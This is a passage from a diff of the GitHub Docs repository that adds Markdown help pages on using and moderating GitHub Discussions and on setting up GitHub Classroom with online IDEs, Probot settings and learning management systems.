requests](/github/building-a-strong-community/using-templates-to-encourage-useful-issues-and-pull-requests)" - "[Moderating comments and conversations](/articles/moderating-comments-and-conversations)" - "[Writing on {% data variables.product.prodname_dotcom %}](/articles/writing-on-github)" 21 content/discussions/guides/finding-discussions-across-multiple-repositories.md @@ -0,0 +1,21 @@ --- title: Finding discussions across multiple repositories intro: 'You can easily access every discussion you''ve created or participated in across multiple repositories.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Finding discussions 1. Navigate to {% data variables.product.prodname_dotcom_the_website %}. 1. In the top-right corner of {% data variables.product.prodname_dotcom_the_website %}, click your profile photo, then click **Your enterprises**.  1. Toggle between **Created** and **Commented** to see the discussions you've created or participated in. ### Further reading - "[Searching discussions](/github/searching-for-information-on-github/searching-discussions)" - "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions)" - "[Managing discussions for your community](/discussions/managing-discussions-for-your-community)" 32 content/discussions/guides/granting-higher-permissions-to-top-contributors.md @@ -0,0 +1,32 @@ --- title: Granting higher permissions to top contributors intro: 'Repository administrators can promote any community member to a moderator and maintainer.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Introduction The most helpful contributors for the past 30 days are highlighted on the {% data variables.product.prodname_discussions %} dashboard, based on how many comments were marked as answers by other community members. Helpful contributors can help drive a healthy community and moderate and guide the community space in addition to maintainers. ### Step 1: Audit your discussions top contributors {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. Compare the list of contributors with their access permissions to see who qualifies to moderate the discussion. ### Step 2: Review permission levels for discussions People with triage permissions for a repository can help moderate a project's discussions by marking comments as answers, locking discussions that are not longer useful or are damaging to the community, and converting issues to discussions when an idea is still in the early stages of development. For more information, see "[Moderating discussions](/discussions/managing-discussions-for-your-community/moderating-discussions)." For more information about repository permission levels and {% data variables.product.prodname_discussions %}, see "[Repository permissions levels for an organization](/github/setting-up-and-managing-organizations-and-teams/repository-permission-levels-for-an-organization)." ### Step 3: Change permissions levels for top contributors You can change a contributor's permission levels to give them more access to the tooling they need to moderate GitHub Discussions. To change a person's or team's permission levels, see "[Managing teams and people with access to your repository](/github/administering-a-repository/managing-teams-and-people-with-access-to-your-repository)." ### Step 4: Notify community members of elevated access When you change a collaborators permission level, they will receive a notification for the change. 29 content/discussions/guides/index.md @@ -0,0 +1,29 @@ --- title: Discussions guides shortTitle: Guides intro: 'Discover pathways to get started or learn best practices for participating or monitoring your community''s discussions.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Getting started with discussions {% link_in_list /about-discussions %} {% link_in_list /best-practices-for-community-conversations-on-github %} {% link_in_list /finding-discussions-across-multiple-repositories %} <!-- {% link_in_list /managing-notifications-for-discussions %} --> ### Administering discussions {% link_in_list /granting-higher-permissions-to-top-contributors %} <!--<!-- Commenting out what is only nice to have for discussions release {% link_in_list /updating-your-contributing-guidelines-with-discussions %} --> <!-- ### Discussions and open source projects {% link_in_list /collaborating-on-open-source-projects-in-discussions %} {% link_in_list /welcoming-contributions-to-your-communitys-discussions %} --> 55 content/discussions/index.md @@ -0,0 +1,55 @@ --- title: GitHub Discussions Documentation beta_product: true shortTitle: GitHub Discussions intro: '{% data variables.product.prodname_discussions %} is a collaborative communication forum for the community around an open source project. Community members can ask and answer questions, share updates, have open-ended conversations, and follow along on decisions affecting the community''s way of working.' introLinks: quickstart: /discussions/quickstart featuredLinks: guides: - /discussions/collaborating-with-your-community-using-discussions/about-discussions - /discussions/collaborating-with-your-community-using-discussions/participating-in-a-discussion - /discussions/managing-discussions-for-your-community/moderating-discussions gettingStarted: - /discussions/quickstart guideCards: - /discussions/collaborating-with-your-community-using-discussions/about-discussions - /discussions/collaborating-with-your-community-using-discussions/participating-in-a-discussion - /discussions/managing-discussions-for-your-community/moderating-discussions popular: - /discussions/guides/granting-higher-permissions-to-top-contributors - /discussions/guides/best-practices-for-community-conversations-on-github - /discussions/guides/finding-discussions-across-multiple-repositories - /discussions/collaborating-with-your-community-using-discussions/collaborating-with-maintainers-using-discussions - /discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository product_video: https://www.youtube-nocookie.com/embed/DbTWBP3_RbM layout: product-landing versions: free-pro-team: '*' --- <!-- {% link_with_intro /quickstart %} --> <!-- {% link_with_intro /discussions-guides %} --> <!-- {% link_with_intro /collaborating-with-your-community-using-discussions %} --> <!-- {% link_with_intro /managing-discussions-for-your-community %} --> <!-- Community examples --> {% assign discussionsCommunityExamples = site.data.variables.discussions_community_examples %} {% if discussionsCommunityExamples %} <div class="my-6 pt-6"> <h2 class="mb-2 font-mktg h1">Communities using discussions</h2> <div class="d-flex flex-wrap gutter"> {% render 'discussions-community-card' for discussionsCommunityExamples as example %} </div> {% if discussionsCommunityExamples.length > 6 %} <button class="js-filter-card-show-more btn btn-outline float-right">Show more {% octicon "arrow-right" %}</button> {% endif %} <div class="js-filter-card-no-results d-none py-4 text-center text-gray font-mktg"> <div class="mb-3">{% octicon "search" width="24" %}</div> <h3 class="text-normal">Sorry, there is no result for <strong class="js-filter-card-value"></strong></h3> <p class="my-3 f4">It looks like we don't have an example that fits your filter.<br>Try another filter or add your code example</p> <a href="https://github.com/github/docs/blob/main/data/variables/discussions_community_examples.yml">Add your community {% octicon "arrow-right" %}</a> </div> </div> {% endif %} 13 content/discussions/managing-discussions-for-your-community/index.md @@ -0,0 +1,13 @@ --- title: Managing discussions for your community shortTitle: Managing discussions intro: 'You can enable and configure discussions for your repository, and you can use tools on {% data variables.product.product_name %} to moderate conversations among community members.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} {% link_in_list /managing-discussions-in-your-repository %} {% link_in_list /managing-categories-for-discussions-in-your-repository %} {% link_in_list /moderating-discussions %} 64 ...ns-for-your-community/managing-categories-for-discussions-in-your-repository.md @@ -0,0 +1,64 @@ --- title: Managing categories for discussions in your repository intro: You can categorize the discussions in your repository to organize conversations for your community members, and you can choose a format for each category. permissions: Repository administrators and people with write or greater access to a repository can enable discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About categories for discussions {% data reusables.discussions.about-discussions %} {% data reusables.discussions.about-categories-and-formats %} Each category must have a unique name and emoji pairing, and can be accompanied by a detailed description stating its purpose. Categories help maintainers organize how conversations are filed and are customizable to help distinguish categories that are Q&A or more open-ended conversations.{% data reusables.discussions.repository-category-limit %} For more information, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions#about-categories-and-formats-for-discussions)." ### Default categories | Category | Purpose | Type | | :- | :- | :- | | #️⃣ General | Anything and everything relevant to the project | Open-ended discussion | |💡Ideas | Ideas to change or improve the project | Open-ended discussion | | 🙏 Q&A | Questions for the community to answer, with a question/answer format | Question and Answer | | 🙌 Show and tell | Creations, experiments, or tests relevant to the project | Open-ended discussion | ### Creating a category {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.edit-categories %} 1. Click **New category**.  1. Edit the emoji, title, description, and discussion format for the category. For more information about discussion formats, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions#about-categories-and-formats-for-discussions)."  1. Click **Create**.  ### Editing a category You can edit a category to change the category's emoji, title, description, and discussion format. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. To the right of a category in the list, click {% octicon "pencil" aria-label="The pencil icon" %}.  1. {% data reusables.discussions.edit-category-details %}  1. Click **Save changes**.  ### Deleting a category When you delete a category, {% data variables.product.product_name %} will move all discussions in the deleted category to an existing category that you choose. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. To the right of a category in the list, click {% octicon "trash" aria-label="The trash icon" %}.  1. Use the drop-down menu, and choose a new category for any discussions in the category you're deleting.  1. Click **Delete & Move**.  108 ...aging-discussions-for-your-community/managing-discussions-in-your-repository.md @@ -0,0 +1,108 @@ --- title: Managing discussions in your repository intro: You can categorize, spotlight, transfer, or delete the discussions in a repository. permissions: Repository administrators and people with write or greater access to a repository can manage discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About management of discussions {% data reusables.discussions.about-discussions %} For more information about discussions, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions)." Organization owners can choose the permissions required to create a discussion for repositories owned by the organization. For more information, see "[Managing discussion creation for repositories in your organization](/github/setting-up-and-managing-organizations-and-teams/managing-discussion-creation-for-repositories-in-your-organization)." As a discussions maintainer, you can create community resources to encourage discussions that are aligned with the overall project goal and maintain a friendly open forum for collaborators. Creating a code of conduct or contribution guidelines for collaborators to follow will help facilitate a collaborative and productive forum. For more information on creating community resources, see "[Adding a code of conduct to your project](/github/building-a-strong-community/adding-a-code-of-conduct-to-your-project)," and "[Setting guidelines for repository contributors](/github/building-a-strong-community/setting-guidelines-for-repository-contributors)." For more information on facilitating a healthy discussion, see "[Moderating comments and conversations](/github/building-a-strong-community/moderating-comments-and-conversations)." ### Prerequisites To manage discussions in a repository, discussions must be enabled for the repository. For more information, see "[Enabling or disabling discussions for a repository](/github/administering-a-repository/enabling-or-disabling-github-discussions-for-a-repository)." ### Changing the category for a discussion You can categorize discussions to help community members find related discussions. For more information, see "[Managing categories for discussions in your repository](/discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository)" article. You can also move a discussion to a different category. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "pencil" aria-label="The pencil icon" %} **Edit pinned discussion**.  ### Pinning a discussion You can pin up to four important discussions above the list of discussions for the repository. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "pin" aria-label="The pin icon" %} **Pin discussion**.  1. Optionally, customize the look of the pinned discussion.  1. Click **Pin discussion**.  ### Editing a pinned discussion Editing a pinned discussion will not change the discussion's category. For more information, see "[Managing categories for discussions in your repository](/discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository)." {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "pencil" aria-label="The pencil icon" %} **Edit pinned discussion**.  1. Customize the look of the pinned discussion.  1. Click **Pin discussion**.  ### Unpinning a discussion {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "pin" aria-label="The pin icon" %} **Unpin discussion**.  1. Read the warning, then click **Unpin discussion**.  ### Transferring a discussion To transfer a discussion, you must have permissions to create discussions in the repository where you want to transfer the discussion. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "arrow-right" aria-label="The right arrow icon" %} **Transfer discussion**.  1. Select the **Choose a repository** drop-down, and click the repository you want to transfer the discussion to.  1. Click **Transfer discussion**.  ### Deleting a discussion {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} {% data reusables.discussions.click-discussion-in-list %} 1. In the right sidebar, click {% octicon "trash" aria-label="The trash arrow icon" %} **Delete discussion**.  1. Read the warning, then click **Delete this discussion**.  ### Converting issues based on labels You can convert all issues with the same label to discussions in bulk. Future issues with this label will also automatically convert to the discussion and category you configure. {% data reusables.repositories.navigate-to-repo %} {% data reusables.repositories.sidebar-issues %} {% data reusables.project-management.labels %} 1. Next to the label you want to convert to issues, click **Convert issues**. 1. Select the **Choose a category** drop-down menu, and click a category for your discussion. 1. Click **I understand, convert this issue to a discussion**. 40 ...t/discussions/managing-discussions-for-your-community/moderating-discussions.md @@ -0,0 +1,40 @@ --- title: Moderating discussions intro: 'You can promote healthy collaboration by marking comments as answers, locking or unlocking discussions, and converting issues to discussions. and editing or deleting comments, discussions, and categories that don''t align with your community''s code of conduct to discussions.' permissions: People with triage access to a repository can moderate discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About moderating discussions {% data reusables.discussions.about-discussions %} If you have triage permissions for a repository, you can help moderate a project's discussions by marking comments as answers, locking discussions that are not longer useful or are damaging to the community, and converting issues to discussions when an idea is still in the early stages of development. ### Marking a comment as an answer {% data reusables.discussions.marking-a-comment-as-an-answer %} ### Locking discussions It's appropriate to lock a conversation when the entire conversation is not constructive or violates your community's code of conduct or {% data variables.product.prodname_dotcom %}'s [Community Guidelines](/github/site-policy/github-community-guidelines). You can also lock a conversation to prevent comments on a discussion you want to use as an announcement to the community. When you lock a conversation, people with write access to the repository will still be able to comment on the discussion. {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. In the list of discussions, click the discussion you want to lock.  1. In the right margin of a discussion, click **Lock conversation**. 1. Read the information about locking conversations and click **Lock conversation on this discussion**. 1. When you're ready to unlock the conversation, click **Unlock conversation**, then click **Unlock conversation on this discussion**. ### Converting an issue to a discussion When you convert an issue to a discussion, the discussion is automatically created using the content from the issue. People with write access to a repository can bulk convert issues based on labels. For more information, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository)." {% data reusables.repositories.navigate-to-repo %} {% data reusables.repositories.sidebar-issues %} 1. In the list of issues, click the issue you'd like to convert. 1. In the right margin of an issue, click **Convert to discussion**. 1. Select the **Choose a category** drop-down menu, and click a category for your discussion. 1. Click **I understand, convert this issue to a discussion**. 62 content/discussions/quickstart.md @@ -0,0 +1,62 @@ --- title: Quickstart for GitHub Discussions intro: 'Enable {% data variables.product.prodname_discussions %} on an existing repository and start conversations with your community.' allowTitleToDifferFromFilename: true versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Introduction {% data variables.product.prodname_discussions %} is a collaborative communication forum for the community around an open source project. Discussions are for conversations that need to be transparent and accessible but do not need to be tracked on a project board and are not related to code, unlike issues. Discussions enable fluid, open conversation in a public forum. Discussions give a space for more collaborative conversations by connecting and giving a more centralized area to connect and find information. ### Enabling {% data variables.product.prodname_discussions %} on your repository Repository owners and people with write access can enable {% data variables.product.prodname_discussions %} for a community on their public repositories. When you first enable a {% data variables.product.prodname_discussions %}, you will be invited to configure a welcome post. {% data reusables.repositories.navigate-to-repo %} 1. Under your repository name, click {% octicon "gear" aria-label="The gear icon" %} **Settings**.  1. Under "Features", click **Set up discussions**.  1. Under "Start a new discussion," edit the template to align with the resources and tone you want to set for your community. 1. Click **Start discussion**.  ### Welcoming contributions to your discussions You can welcome your community and introduce a new way to communicate in a repository by creating a welcome post and pin the post to your {% data variables.product.prodname_discussions %} page. Pinning and locking discussions helps people know that a post is meant as an announcement. You can use announcements as a way to link people to more resources and offer guidance for opening discussions in your community. For more information about pinning a discussion, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository#pinning-a-discussion)." ### Setting up community guidelines for contributors You can set contributing guidelines to encourage collaborators to have meaningful, useful conversations that are relevant to the repository. You can also update the repository's README to communicate expectations on when collaborators should open an issue or discussion. For more information about providing guidelines for your project, see "[Adding a code of conduct to your project](/github/building-a-strong-community/adding-a-code-of-conduct-to-your-project)" and "[Setting up your project for healthy contributions](/github/building-a-strong-community/setting-up-your-project-for-healthy-contributions)." ### Creating a new discussion Anyone with access to a repository can create a discussion. {% data reusables.discussions.starting-a-discussion %} ### Organizing discussions into relevant categories Repository owners and people with write access can create new categories to keep discussions organized. Collaborators participating and creating new discussions can group discussions into the most relevant existing categories. Discussions can also be recategorized after they are created. For more information, see "[Managing categories for discussions in your repository](/discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository)" ### Promoting healthy conversations People with write permissions for a repository can help surface important conversations by pinning discussions, deleting discussions that are no longer useful or are damaging to the community, and transferring discussions to more relevant repositories owned by the organization. For more information, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository)." People with triage permissions for a repository can help moderate a project's discussions by marking comments as answers, locking discussions that are not longer useful or are damaging to the community, and converting issues to discussions when an idea is still in the early stages of development. For more information, see "[Moderating discussions](/discussions/managing-discussions-for-your-community/moderating-discussions)." ### Next steps Once there is a clear path to scope work out and move an idea from concept to reality, you can create an issue and start tracking your progress. For more information on creating an issue from a discussion, see "[Moderating discussions](/discussions/managing-discussions-for-your-community/moderating-discussions)." 45 content/education/guides.md @@ -0,0 +1,45 @@ --- title: Guides for GitHub Education intro: 'These guides for {% data variables.product.prodname_education %} help you teach and learn both {% data variables.product.product_name %} and software development.' allowTitleToDifferFromFilename: true versions: free-pro-team: '*' --- ### Get started with {% data variables.product.product_name %} Teachers, students, and researchers can use tools from {% data variables.product.product_name %} to enrich a software development curriculum and develop real-world collaboration skills. - [Sign up for a new {% data variables.product.prodname_dotcom %} account](/github/getting-started-with-github/signing-up-for-a-new-github-account) - [Git and {% data variables.product.prodname_dotcom %} quickstart ](/github/getting-started-with-github/quickstart) - [Apply for an educator or researcher discount](/education/teach-and-learn-with-github-education/apply-for-an-educator-or-researcher-discount) - [Apply for a student developer pack](/education/teach-and-learn-with-github-education/apply-for-a-student-developer-pack) ### Run a software development course with {% data variables.product.company_short %} Administer a classroom, assign and review work from your students, and teach the new generation of software developers with {% data variables.product.prodname_classroom %}. - [Basics of setting up {% data variables.product.prodname_classroom %} ](/education/manage-coursework-with-github-classroom/basics-of-setting-up-github-classroom) - [Manage classrooms](/education/manage-coursework-with-github-classroom/manage-classrooms) - [Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment) - [Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment) - [Create an assignment from a template repository](/education/manage-coursework-with-github-classroom/create-an-assignment-from-a-template-repository) - [Leave feedback with pull requests](/education/manage-coursework-with-github-classroom/leave-feedback-with-pull-requests) - [Use autograding](/education/manage-coursework-with-github-classroom/use-autograding) ### Learn to develop software Incorporate {% data variables.product.prodname_dotcom %} into your education, and use the same tools as the professionals. - [Git and {% data variables.product.prodname_dotcom %} learning resources](/github/getting-started-with-github/git-and-github-learning-resources) - [Use {% data variables.product.prodname_dotcom %} for your schoolwork](/education/teach-and-learn-with-github-education/use-github-for-your-schoolwork) - [Try {% data variables.product.prodname_desktop %}](/desktop) - [Try {% data variables.product.prodname_cli %}](/github/getting-started-with-github/github-cli) ### Contribute to the community Participate in the community, get training from {% data variables.product.company_short %}, and learn or teach new skills. - [{% data variables.product.prodname_education_community %}](https://education.github.community) - [About Campus Experts](/education/teach-and-learn-with-github-education/about-campus-experts) - [About Campus Advisors](/education/teach-and-learn-with-github-education/about-campus-advisors) 43 content/education/index.md @@ -0,0 +1,43 @@ --- title: GitHub Education Documentation shortTitle: Education intro: "{% data variables.product.prodname_education %} helps you teach or learn software development with the tools and support of {% data variables.product.company_short %}'s platform and community." introLinks: quickstart: /education/quickstart featuredLinks: guides: - /education/teach-and-learn-with-github-education/apply-for-a-student-developer-pack - /education/teach-and-learn-with-github-education/apply-for-an-educator-or-researcher-discount - /education/teach-and-learn-with-github-education/use-github-at-your-educational-institution guideCards: - /github/getting-started-with-github/signing-up-for-a-new-github-account - /github/getting-started-with-github/git-and-github-learning-resources - /education/manage-coursework-with-github-classroom/basics-of-setting-up-github-classroom popular: - /education/teach-and-learn-with-github-education/use-github-for-your-schoolwork - /education/teach-and-learn-with-github-education/use-github-in-your-classroom-and-research - /desktop - /github/getting-started-with-github/github-cli - /education/manage-coursework-with-github-classroom/teach-with-github-classroom changelog: - title: 'Try something new at Local Hack Day: Learn' date: '2020-10-15' href: https://github.blog/2020-10-15-try-something-new-at-local-hack-day-learn/ - title: 'Remote Education: Creating community through shared experiences' date: '2020-09-24' href: https://github.blog/2020-09-24-remote-education-creating-community-through-shared-experiences/ - title: 'Remote Education: A series of best practices for online campus communities' date: '2020-09-10' href: https://github.blog/2020-09-10-remote-education-a-series-of-best-practices-for-online-campus-communities/ - title: Welcome to the inaugural class of MLH Fellows date: '2020-06-24' href: https://github.blog/2020-06-24-welcome-to-the-inaugural-class-of-mlh-fellows/ layout: product-landing versions: free-pro-team: '*' --- <!-- {% link_with_intro /teach-and-learn-with-github-education %} --> <!-- {% link_with_intro /manage-coursework-with-github-classroom %} --> 31 ...work-with-github-classroom/about-using-makecode-arcade-with-github-classroom.md @@ -0,0 +1,31 @@ --- title: About using MakeCode Arcade with GitHub Classroom shortTitle: About using MakeCode Arcade intro: You can configure MakeCode Arcade as the online IDE for assignments in {% data variables.product.prodname_classroom %}. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/student-experience-makecode --- ### About MakeCode Arcade MakeCode Arcade is an online integrated development environment (IDE) for developing retro arcade games using drag-and-drop block programming and JavaScript. Students can write, edit, run, test, and debug code in a browser with MakeCode Arcade. For more information about online IDEs and {% data variables.product.prodname_classroom %}, see "[Integrate {% data variables.product.prodname_classroom %} with an online IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-online-ide)." {% data reusables.classroom.readme-contains-button-for-online-ide %} The first time the student clicks the button to visit MakeCode Arcade, the student must sign into MakeCode Arcade with {% data variables.product.product_name %} credentials. After signing in, the student will have access to a development environment containing the code from the assignment repository, fully configured on MakeCode Arcade. For more information about working on MakeCode Arcade, see the [MakeCode Arcade Tour](https://arcade.makecode.com/ide-tour) and [documentation](https://arcade.makecode.com/docs) on the MakeCode Arcade website. MakeCode Arcade does not support multiplayer-editing for group assignments. Instead, students can collaborate with Git and {% data variables.product.product_name %} features like branches and pull requests. ### About submission of assignments with MakeCode Arcade By default, MakeCode Arcade is configured to push to the assignment repository on {% data variables.product.product_location %}. After making progress on an assignment with MakeCode Arcade, students should push changes to {% data variables.product.product_location %} using the {% octicon "mark-github" aria-label="The GitHub mark" %}{% octicon "arrow-up" aria-label="The up arrow icon" %} button at the bottom of the screen.  ### Further reading - "[About READMEs](/github/creating-cloning-and-archiving-repositories/about-readmes)" 33 ...ge-coursework-with-github-classroom/about-using-replit-with-github-classroom.md @@ -0,0 +1,33 @@ --- title: About using Repl.it with GitHub Classroom shortTitle: About using Repl.it intro: You can configure Repl.it as the online integrated development environment (IDE) for assignments in {% data variables.product.prodname_classroom %}. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/student-experience-replit --- ### About Repl.it Repl.it is an online integrated development environment (IDE) that supports multiple programming languages. Students can write, edit, run, test, and debug code in a browser with Repl.it. For more information about online IDEs and {% data variables.product.prodname_classroom %}, see "[Integrate {% data variables.product.prodname_classroom %} with an online IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-online-ide)." {% data reusables.classroom.readme-contains-button-for-online-ide %} The first time the student clicks the button to visit Repl.it, the student must sign into Repl.it with {% data variables.product.product_name %} credentials. After signing in, the student will have access to a development environment containing the code from the assignment repository, fully configured on Repl.it. For more information about working on Repl.it, see the [Repl.it Quickstart Guide](https://docs.repl.it/misc/quick-start#the-repl-environment). For group assignments, students can use Repl.it Multiplayer to work collaboratively. For more information, see the [Repl.it Multiplayer](https://repl.it/site/multiplayer) website. ### About submission of assignments with Repl.it By default, Repl.it is configured to push to the assignment repository on {% data variables.product.product_location %}. After making progress on an assignment with Repl.it, students should push changes to {% data variables.product.product_location %} using the version control functionality in the left sidebar.  For more information about using Git on Repl.it, see the [Repl.it + Git Tutorial](https://repl.it/talk/learn/Replit-Git-Tutorial/23331) on the Repl.it website. ### Further reading - "[About READMEs](/github/creating-cloning-and-archiving-repositories/about-readmes)" 33 ...anage-coursework-with-github-classroom/basics-of-setting-up-github-classroom.md @@ -0,0 +1,33 @@ --- title: Basics of setting up GitHub Classroom shortTitle: '{% data variables.product.prodname_classroom %} basics' intro: Learn how to set up your classroom, manage assignments, and configure time-saving automation. versions: free-pro-team: '*' --- ### Videos about {% data variables.product.prodname_classroom %} You can watch a series of short video tutorials about the configuration and use of {% data variables.product.prodname_classroom %}. To watch all videos as part of a continuous playlist, see the [{% data variables.product.prodname_classroom %} Getting Started Guide](https://www.youtube.com/playlist?list=PLIRjfNq867bewk3ZGV6Z7a16YDNRCpK3u) on YouTube. For more information about terminology for {% data variables.product.prodname_classroom %}, see "[Glossary](/education/manage-coursework-with-github-classroom/glossary)". 1. <a href="https://youtu.be/xVVeqIDgCvM" target="_blank">Getting started</a> {% octicon "link-external" aria-label="The external link icon" %} 2. <a href="https://youtu.be/DTzrKduaHj8" target="_blank">Adding your student roster</a> {% octicon "link-external" aria-label="The external link icon" %} 3. Creating assignments - <a href="https://youtu.be/6QzKZ63KLss" target="_blank">Creating an assignment using a {% data variables.product.prodname_dotcom %} repository</a> {% octicon "link-external" aria-label="The external link icon" %} - <a href="https://youtu.be/Qmwh6ijsQJU" target="_blank">Creating an assignment using Microsoft MakeCode as your online IDE</a> {% octicon "link-external" aria-label="The external link icon" %} - <a href="https://youtu.be/p_g5sQ7hUis" target="_blank">Creating an assignment using Repl.it as your online IDE</a> {% octicon "link-external" aria-label="The external link icon" %} 4. <a href="https://youtu.be/ObaFRGp_Eko" target="_blank">How students complete assignments</a> {% octicon "link-external" aria-label="The external link icon" %} 5. <a href="https://youtu.be/g45OJn3UyCU" target="_blank">How teachers review assignments</a> {% octicon "link-external" aria-label="The external link icon" %} 6. <a href="https://youtu.be/QxrA3taZdNM" target="_blank">Creating group assignments</a> {% octicon "link-external" aria-label="The external link icon" %} 7. <a href="https://youtu.be/tJK2cmoh1KM" target="_blank">Next steps to get started</a> {% octicon "link-external" aria-label="The external link icon" %} 8. <a href="https://youtu.be/X87v3SFQxLU" target="_blank">{% data variables.product.prodname_dotcom %} Teacher Toolbox</a> {% octicon "link-external" aria-label="The external link icon" %} ### Next steps For more information about teaching with {% data variables.product.prodname_classroom %}, see "[Teach with {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/teach-with-github-classroom)." ### Further reading - "[Teach and learn with {% data variables.product.prodname_education %}](/education/teach-and-learn-with-github-education)" 51 ...with-github-classroom/configure-default-settings-for-assignment-repositories.md @@ -0,0 +1,51 @@ --- title: Configure default settings for assignment repositories shortTitle: Configure defaults for assignment repositories intro: You can use the Probot Settings app to configure the default settings for repositories that {% data variables.product.prodname_classroom %} creates for an assignment. permissions: Organization owners can configure default settings for assignment repositories by installing a {% data variables.product.prodname_github_app %} for the organization. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/probot-settings --- ### About configuration of defaults for assignment repositories {% data variables.product.prodname_classroom %} creates a repository that belongs for each student or team that accepts an assignment. The repository belongs to the organization that you use for {% data variables.product.prodname_classroom %}. Assignment repositories can be empty, or you can use a template repository. For more information, see "[Create an assignment from a template repository](/education/manage-coursework-with-github-classroom/create-an-assignment-from-a-template-repository)." {% data reusables.classroom.you-may-want-to-predefine-repository-settings %} With the Probot Settings app, you can create a file named _.github/settings.yml_ in a repository that contains a list of settings for the repository, and then install a {% data variables.product.prodname_github_app %} for your organization that automatically applies the settings to the repository. You can include _.github/settings.yml_ in a template repository that you use for an assignment in {% data variables.product.prodname_classroom %}. When an individual or team accepts the assignment, {% data variables.product.prodname_classroom %} creates the assignment repository, and the Settings app automatically applies the settings from _.github/settings.yml_. Probot is a a project, framework, and collection of free apps to automate {% data variables.product.product_name %}. A Probot app can listen to repository events, like the creation of new commits, comments, and issues, and automatically respond to the event. For more information, see the [Probot website](https://probot.github.io) and the [Settings app website](https://probot.github.io/apps/settings/). For more information about {% data variables.product.prodname_github_apps %}, see "[About apps](/developers/apps/about-apps)." ### Adding the Settings app to your organization After you install the Probot Settings app for your organization, the app will apply the settings that you define in _.github/settings.yml_ for any repository in your organization, including new assignment repositories that {% data variables.product.prodname_classroom %} creates. 1. Navigate to the [Settings app page](https://github.com/apps/settings). 1. Click **Install**, then click the organization that you use for {% data variables.product.prodname_classroom %}. Provide the app full access to all repositories owned by the organization.  ### Configuring default settings for an assignment repository 1. Create a template repository that contains a _.github/settings.yml_ file. For a complete list of settings, see the [README](https://github.com/probot/settings#github-settings) for the `probot/settings` repository. For more information about using a template repository for starter code in {% data variables.product.prodname_classroom %}, see "[Create an assignment from a template repository](/education/manage-coursework-with-github-classroom/create-an-assignment-from-a-template-repository)." {% warning %} **Warning:** Do not define `collaborators` in the _.github/settings.yml_ file for your template repository. {% data variables.product.prodname_classroom %} automatically grants teachers and teaching assistants access to assignment repositories. {% endwarning %} 1. Create an assignment using the template repository containing _.github/settings.yml_ as the starter code. {% data reusables.classroom.for-more-information-about-assignment-creation %} The Probot Settings app for your organization will now apply the settings you define in _.github/settings.yml_ within the template repository to every assignment repository that {% data reusables.classroom.you-may-want-to-predefine-repository-settings %} creates for a student or team. ### Further reading - [Probot apps](https://probot.github.io/apps/) - [Probot documentation](https://probot.github.io/docs/) 142 ...th-github-classroom/connect-a-learning-management-system-to-github-classroom.md @@ -0,0 +1,142 @@ --- title: Connect a learning management system to GitHub Classroom intro: You can configure an LTI-compliant learning management system (LMS) to connect to {% data variables.product.prodname_classroom %} so that you can import a roster for your classroom. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/configuring-a-learning-management-system-for-github-classroom - /education/manage-coursework-with-github-classroom/connect-to-lms - /education/manage-coursework-with-github-classroom/generate-lms-credentials - /education/manage-coursework-with-github-classroom/setup-canvas - /education/manage-coursework-with-github-classroom/setup-generic-lms - /education/manage-coursework-with-github-classroom/setup-moodle --- ### About configuration of your LMS You can connect a learning management system (LMS) to {% data variables.product.prodname_classroom %}, and {% data variables.product.prodname_classroom %} can import a roster of student identifiers from the LMS. To connect your LMS to {% data variables.product.prodname_classroom %}, you must enter configuration credentials for {% data variables.product.prodname_classroom %} in your LMS. ### Prerequisites To configure an LMS to connect to {% data variables.product.prodname_classroom %}, you must first create a classroom. For more 